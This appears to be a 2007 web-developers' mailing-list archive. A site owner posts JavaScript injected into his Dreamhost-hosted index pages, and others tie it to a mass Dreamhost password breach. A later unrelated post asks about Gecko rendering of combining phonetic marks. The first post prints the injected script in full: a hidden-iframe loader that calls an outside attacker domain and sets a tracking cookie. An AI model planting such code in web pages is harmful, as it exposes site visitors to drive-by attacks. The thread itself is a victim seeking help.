From suzerain at suzerain.com Thu Jun 7 03:18:21 2007
From: suzerain at suzerain.com (Marc Antony Vose)
Date: Tue Mar 4 07:24:12 2008
Subject: [front-end] rogue javascript q
Message-ID: <55AFDA69-7BB0-45D2-B670-409F945E3515@suzerain.com>
Hi there:
I discovered some encrypted javascript code on my web server,
appended to the bottoms of some index.* documents (both .html
and .php). It contains the top script block, whose purpose is
essentially to write out the bottom script block.
Now, the web site this code is finally referencing has been pulled by
its hosting company, so it appears it's kind of useless now.
My question is: anyone heard of it / seen it before? What's the
most likely method it got into my sites? Manually by one of the
people who has worked with me? Some kind of script on the server
itself (Linux host...Dreamhost)? Some script/worm running on one of
my programmers' Windows machines?
I've Google searched a bit, and not found any references to this
code, though I did find a reference to the domain owner on a Russian
forum, but unfortunately I am not fluent in Russian.
http://forum.kaspersky.com/lofiversion/index.php/t37353.html
The code follows... (I separated the lines a bit to make it easier to
read).
++++++++++++
document.write(unescape(""))
++++++++++++
BOTTOM SCRIPT BLOCK:
++++++++++++
/* s1f1l1z */
function lc(Nz,KF){
var Ez=new Date();
var Bq= new Date();
Bq.setTime(Ez.getTime()+86400000);
document.cookie = Nz+"="+escape(KF)+"; expires="+Bq.toGMTString();
}
var fP='ct3l',
HA='1';
var MJ='update1.classictel.org',
hn='/html/';
if(document.cookie.indexOf(fP+'='+HA)==-1){
var fA='http://'+(document.location.host != ''?'':qS())
+document.location.host.replace(/[^a-z0-9.-]/,'.').replace(/\.+/,'.')
+'.'+qS()+'.'+MJ+hn;var So=document.createElement
('iframe');So.setAttribute('src',fA);So.frameBorder=0;
So.width=4;So.height=4;
try {
document.body.appendChild(So);lc(fP,HA);
}
catch(e){
document.write('');
document.body.appendChild(So); lc(fP,HA);
}
}
function qS(){
var nc=24,
Kj="01234567890abcdef";
var ui="";
for(eE=0; eE < nc; eE++) ui+= Kj.substr(Math.floor(Math.random()
*Kj.length),1,1);
return ui;
}
++++++++++++
Any information/theories are appreciated. Mostly, I'm just
interested in figuring out how it got there.
Thanks,
Marc
http://www.suzerain.com
From jay at wnymusic.com Thu Jun 7 03:35:31 2007
From: jay at wnymusic.com (Jay)
Date: Tue Mar 4 07:24:12 2008
Subject: [front-end] rogue javascript q
In-Reply-To: <55AFDA69-7BB0-45D2-B670-409F945E3515@suzerain.com>
References: <55AFDA69-7BB0-45D2-B670-409F945E3515@suzerain.com>
Message-ID:
I saw this on the internet today. Dreamhost was hacked via leaked passwords...
http://news.netcraft.com/archives/2007/06/06/mass_customer_site_hack_at_dreamhost.html
Approximately 700 web sites and 3,500 FTP accounts have been
compromised at DreamHost in recent weeks, with crackers inserting
invisible links to porn sites in the HTML code of the hacked pages.
These invisible links are typically used to boost search engine
ranking in Google, which uses links from outside sites as a key
indicator of a site's popularity.
From suzerain at suzerain.com Thu Jun 7 03:44:28 2007
From: suzerain at suzerain.com (Marc Antony Vose)
Date: Tue Mar 4 07:24:12 2008
Subject: [front-end] rogue javascript q
In-Reply-To: <55AFDA69-7BB0-45D2-B670-409F945E3515@suzerain.com>
References: <55AFDA69-7BB0-45D2-B670-409F945E3515@suzerain.com>
Message-ID:
Following up to my own post...
One of my friends sent me this:
http://news.netcraft.com/archives/2007/06/06/mass_customer_site_hack_at_dreamhost.html
> Approximately 700 web sites and 3,500 FTP accounts have been
> compromised at DreamHost in recent weeks, with crackers inserting
> invisible links to porn sites in the HTML code of the hacked pages.
> These invisible links are typically used to boost search engine
> ranking in Google, which uses links from outside sites as a key
> indicator of a site's popularity.
I'd guess this is what I'm looking at here...I post in case there are
other Dreamhost users here. Might want to change your passwords...
Cheers,
Marc
From suzerain at suzerain.com Thu Jun 7 03:46:15 2007
From: suzerain at suzerain.com (Marc Antony Vose)
Date: Tue Mar 4 07:24:12 2008
Subject: [front-end] rogue javascript q
In-Reply-To:
References: <55AFDA69-7BB0-45D2-B670-409F945E3515@suzerain.com>
Message-ID: <61565412-C8D2-4DDB-83EC-7CBA64ACA697@suzerain.com>
Hi there:
Aha...that sounds like the probable cause. Thanks for that...I guess
changing my password was a good choice.
I'm going offline for a while...have a good day.
Cheers,
Marc
From suzerain at suzerain.com Mon Jun 18 18:46:49 2007
From: suzerain at suzerain.com (Marc Antony Vose)
Date: Tue Mar 4 07:24:12 2008
Subject: [front-end] combining phonetic symbols
Message-ID: <652D5079-D7A7-42BC-8CC2-9810EA1C6BE4@suzerain.com>
Hi there:
I'm having trouble with gecko. It's not displaying Unicode combining
phonetic symbols correctly, best as I can tell. Meaning, the
combining breve, combining acute accent, combining macron and
combining grave accent. (This is an application for displaying
Chinese pinyin phonetics.)
This page illustrates this:
http://www.suzerain.com/_test/phonetic_symbols/
View the source...it's just got some codes in it for the characters.
It displays properly in Safari and in Internet Explorer for Windows.
In any gecko browser (Firefox, Camino, etc.), the combining symbols
don't display over the character, as they should.
Is this just a limitation of the gecko text renderer?
Cheers,
Marc Vose
http://www.suzerain.com